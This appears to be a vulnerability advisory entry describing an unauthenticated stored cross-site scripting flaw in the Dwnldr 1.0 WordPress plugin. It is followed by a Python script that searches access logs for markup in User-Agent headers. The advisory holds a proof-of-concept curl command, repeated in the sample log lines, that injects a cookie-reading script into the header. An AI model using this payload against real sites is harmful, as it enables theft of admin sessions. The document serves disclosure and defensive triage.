wpexploit | Rob Carr | WPEX-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11E
History: Jul 18, 2016 - 12:00 a.m.

Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

2016-07-18 00:00:00
Rob Carr
EPSS: 0.001 (Low), percentile 32.7%

Dwnldr logs the User-Agent string of every download request it processes and displays it back to the admin with no output encoding, so a script supplied in that header is stored and then executed in the admin's browser.

curl -A "User-Agent: <script>alert(document.cookie);</script>" -O http://<target>/?attachment_id=<attachment id>  
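For triage on a site that ran the plugin, the check below is an added example (not part of the advisory or the plugin's code): it scans web server access logs for `attachment_id` requests whose User-Agent contains markup, and HTML-encodes the value before reporting it. It assumes Apache/nginx "combined" log format; the sample lines and addresses are constructed.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# Angle brackets do not appear in legitimate User-Agent strings.
MARKUP_RE = re.compile(r'[<>]')


def find_suspect_downloads(lines):
    """Return (ip, attachment_id, escaped_ua) for attachment requests
    whose User-Agent header carries HTML markup."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        query = parse_qs(urlsplit(m.group("target")).query)
        if "attachment_id" not in query:
            continue  # only requests of the kind the advisory describes
        ua = m.group("ua")
        if MARKUP_RE.search(ua):
            # Encode before reporting so the triage output cannot
            # re-render the stored payload in an analyst's browser.
            hits.append((m.group("ip"), query["attachment_id"][0],
                         html.escape(ua, quote=True)))
    return hits


# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2016:10:01:02 +0000] "GET /?attachment_id=42 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/47.0"',
    '198.51.100.23 - - [18/Jul/2016:10:03:44 +0000] "GET /?attachment_id=42 HTTP/1.1" '
    '200 5120 "-" "User-Agent: <script>alert(document.cookie);</script>"',
    '192.0.2.15 - - [18/Jul/2016:10:05:10 +0000] "GET /wp-login.php HTTP/1.1" '
    '200 2301 "-" "<b>probe</b>"',
]

if __name__ == "__main__":
    for ip, attachment_id, ua in find_suspect_downloads(SAMPLE_LOG):
        print(f"{ip} attachment_id={attachment_id} ua={ua}")
```

The same encoding step, applied where the plugin renders its download log to the admin, is what the description above says is missing.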
